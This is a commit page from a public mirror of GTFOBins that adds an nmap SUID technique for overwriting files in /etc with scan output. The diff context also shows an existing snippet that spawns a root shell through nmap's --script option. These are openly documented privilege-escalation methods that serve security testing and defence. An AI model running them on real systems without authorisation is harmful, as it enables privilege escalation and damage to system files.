public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-25 22:40:10 +01:00
Code Issues Projects Releases Wiki Activity

Adding another usage of Nmap's SUID

Browse Source 
I came along with this method on stackoverflow while trying to execute commands using a SUID nmap binary, though `--script` failed me but this works. Could be enough to demonstrate effect of using SUID on Nmap. 

I've yet to come up with a way to over-write the contents of the system file according to what we want, with this we can only over-write files with nmap output.

```bash
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
```
This commit is contained in:
Syed Umar Arfeen 2021-01-04 12:16:29 +05:00 committed by GitHub
parent 1c07880178
commit edc8a2d03d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
_gtfobins/nmap.md
View File

@ -108,4 +108,9 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF ./nmap --script=$TF
- description: This will over-write files with nmap output, use with caution.
code: |
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
--- ---